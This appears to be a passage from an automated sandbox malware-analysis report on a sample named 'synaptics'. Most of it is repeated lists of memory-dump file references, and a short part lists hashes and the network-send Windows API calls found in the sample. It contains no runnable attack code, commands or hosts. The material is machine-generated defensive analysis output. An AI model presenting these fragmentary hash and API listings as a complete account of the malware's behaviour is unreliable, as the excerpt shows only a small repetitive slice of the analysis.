                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C824000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C826000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C828000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C830000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C832000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C834000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C836000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C838000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C841000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C843000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C854000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C856000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C858000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C85A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C865000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C867000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C869000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C86B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C874000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C876000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C878000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87A000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C880000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C882000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C884000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C886000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C893000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C898000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89A000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A2000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AA000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AC000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8B1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8B6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8C7000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8C9000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8CB000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8CD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E7000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E9000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8EB000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8ED000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8EF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2144935941.000000006C8F7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C8FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C900000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C903000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C905000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C907000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C909000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C90B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C90D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_20_2_6c6e0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorLast$sendsendto
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3676581841-0
                                                                                                                                                                                                                                    • Opcode ID: 91193177b0e116d1e2916a91a416dc3cec991ae172ebc5286061f7a027a544c2
                                                                                                                                                                                                                                    • Instruction ID: c66453b87b7fe488f699d9a8e79ca1858e1499bbca9931bb3e4b779f09ac6b03
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 91193177b0e116d1e2916a91a416dc3cec991ae172ebc5286061f7a027a544c2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1213B3264D1046BE7100A24DE88F6A7768EB277FCF180236EA5992D90D321EC56E6E1
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • WSASetLastError.WS2_32(00000000), ref: 6C718E9C
                                                                                                                                                                                                                                    • send.WS2_32(?,00000000,00000000,00000000), ref: 6C718EB5
                                                                                                                                                                                                                                    • sendto.WS2_32(?,?,?,00000000,00000000), ref: 6C718EDE
                                                                                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 6C718EFC
                                                                                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 6C718F43
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000014.00000002.2120918855.000000006C70F000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C6E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120807504.000000006C6E0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6ED000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6FC000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6FE000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C720000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C724000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C735000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C737000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C73C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C73E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C740000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C742000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C744000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C749000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C74B000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C75C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C75E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C760000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C762000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C764000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C766000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C768000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C770000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C772000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C780000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C791000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A2000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7AC000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7AE000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7B0000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7B2000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7C3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7C9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7D7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7D9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DB000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DD000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DF000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7F7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7F9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FB000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FD000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FF000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C801000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C812000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C81C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C81E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C820000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C822000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C824000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C826000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C828000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C830000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C832000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C834000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C836000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C838000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C841000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C843000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C854000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C856000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C858000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C85A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C865000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C867000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C869000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C86B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C874000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C876000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C878000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87A000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C880000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C882000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C884000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C886000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C893000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C898000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89A000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A2000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AA000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AC000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8B1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8B6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8C7000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8C9000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8CB000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8CD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E7000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E9000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8EB000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8ED000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8EF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2144935941.000000006C8F7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C8FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C900000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C903000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C905000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C907000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C909000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C90B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C90D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_20_2_6c6e0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorLast$sendsendto
                                                                                                                                                                                                                                    • String ID:
